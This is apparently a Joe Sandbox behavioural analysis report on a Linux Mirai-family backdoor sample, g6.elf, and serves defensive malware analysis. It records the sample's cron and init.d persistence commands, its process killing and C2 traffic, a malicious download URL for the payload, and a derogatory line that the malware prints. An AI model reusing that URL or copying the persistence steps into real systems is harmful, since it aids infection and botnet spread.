Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g6.elf

Overview

General Information

Sample name:g6.elf
Analysis ID:1589899
MD5:741c27fc1ae05e06a0be9374d00d08e7
SHA1:c9c5d841481085bc14d5071c6d5c467a8bf9501d
SHA256:205ac62c0762881b7458328370b2007ad947870de7ea9ae281302fbf4dbcf9f9
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589899
Start date and time:2025-01-13 10:07:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g6.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g6
Command:/tmp/g6.elf
PID:6217
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g6.elf (PID: 6217, Parent: 6142, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g6.elf
    • g6.elf New Fork (PID: 6228, Parent: 6217)
    • sh (PID: 6228, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6234, Parent: 6228)
      • systemctl (PID: 6234, Parent: 6228, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g6.elf New Fork (PID: 6247, Parent: 6217)
    • sh (PID: 6247, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 6252, Parent: 6247)
      • crontab (PID: 6252, Parent: 6247, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g6.elf New Fork (PID: 6253, Parent: 6217)
    • sh (PID: 6253, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 6258, Parent: 6253)
    • g6.elf New Fork (PID: 6262, Parent: 6217)
      • g6.elf New Fork (PID: 6264, Parent: 6262)
        • g6.elf New Fork (PID: 6266, Parent: 6264)
        • g6.elf New Fork (PID: 6267, Parent: 6264)
        • g6.elf New Fork (PID: 6269, Parent: 6264)
  • wrapper-2.0 (PID: 6221, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6222, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6223, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6224, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6225, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6226, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6236, Parent: 6235)
  • snapd-env-generator (PID: 6236, Parent: 6235, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g6.elfVirustotal: Detection: 25%Perma Link
Source: g6.elfReversingLabs: Detection: 31%
Source: global trafficTCP traffic: 192.168.2.23:48826 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.23:45479 -> 1.1.1.1:53
Source: /tmp/g6.elf (PID: 6217)Socket: 127.0.0.1:23476Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g6.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, crontab.tmp.12.dr, tmp.yt4ghW.36.drString found in binary or memory: http://103.136.41.100/g6
Source: g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6221, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6222, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6223, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6224, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6225, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6226, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6221, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6222, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6223, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6224, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6225, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6217)SIGKILL sent: pid: 6226, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6252)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 6252)File: /var/spool/cron/crontabs/tmp.yt4ghWJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6241/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6241/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6240/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6240/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6243/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6243/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6242/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6242/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6245/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6245/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6244/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6244/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6246/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6269)File opened: /proc/6246/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6228)Shell command executed: /bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g6.elf (PID: 6247)Shell command executed: /bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g6.elf (PID: 6253)Shell command executed: /bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 6234)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /tmp/g6.elf (PID: 6217)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g6.elf (PID: 6217)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g6.elf (PID: 6217)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g6.elf (PID: 6217)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6224)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6225)Queries kernel information via 'uname': Jump to behavior
Source: g6.elf, 6217.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.MvEMgk:
Source: g6.elf, 6217.1.000055fa718d9000.000055fa71a2b000.rw-.sdmp, g6.elf, 6262.1.000055fa718d9000.000055fa71a2b000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: g6.elf, 6217.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmpBinary or memory string: /tmp/qemu-open.MvEMgk
Source: g6.elf, 6217.1.000055fa718d9000.000055fa71a2b000.rw-.sdmp, g6.elf, 6262.1.000055fa718d9000.000055fa71a2b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g6.elf, 6217.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmp, g6.elf, 6262.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g6.elf, 6217.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmp, g6.elf, 6262.1.00007ffedf35a000.00007ffedf37b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/g6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g6.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589899 Sample: g6.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 49 109.202.202.202, 80 INIT7CH Switzerland 2->49 51 1.1.1.1, 45479, 53 CLOUDFLARENETUS Australia 2->51 53 3 other IPs or domains 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 g6.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 43 /tmp/crontab.tmp, troff 9->43 dropped 45 /etc/init.d/hello, Bourne-Again 9->45 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g6.elf sh 9->19         started        21 g6.elf sh 9->21         started        23 g6.elf 9->23         started        25 g6.elf sh 9->25         started        signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 g6.elf 23->33         started        35 sh 25->35         started        file9 47 /var/spool/cron/crontabs/tmp.yt4ghW, troff 27->47 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 37 g6.elf 33->37         started        39 g6.elf 33->39         started        41 g6.elf 33->41         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g6.elf25%VirustotalBrowse
g6.elf32%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g6100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg6.elffalse
    high
    http://1/wget.shg6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpfalse
        high
        http://9/curl.shg6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpfalse
          high
          http://103.136.41.100/g6hello.service.12.dr, hello.12.dr, crontab.tmp.12.dr, tmp.yt4ghW.36.drfalse
          • Avira URL Cloud: malware
          unknown
          http://schemas.xmlsoap.org/soap/envelope/g6.elf, 6217.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmp, g6.elf, 6262.1.00007fbe4c036000.00007fbe4c03d000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g3.elfGet hashmaliciousUnknownBrowse
              g4.elfGet hashmaliciousUnknownBrowse
                g3.elfGet hashmaliciousUnknownBrowse
                  g5.elfGet hashmaliciousUnknownBrowse
                    g4.elfGet hashmaliciousUnknownBrowse
                      g6.elfGet hashmaliciousUnknownBrowse
                        g3.elfGet hashmaliciousUnknownBrowse
                          m1.elfGet hashmaliciousUnknownBrowse
                            m5.elfGet hashmaliciousUnknownBrowse
                              m2.elfGet hashmaliciousUnknownBrowse
                                1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                                • 1.1.1.1:8080/
                                6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/ctrl/playback.php
                                PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                                AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/
                                INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                                Go.exeGet hashmaliciousUnknownBrowse
                                • 1.1.1.1/
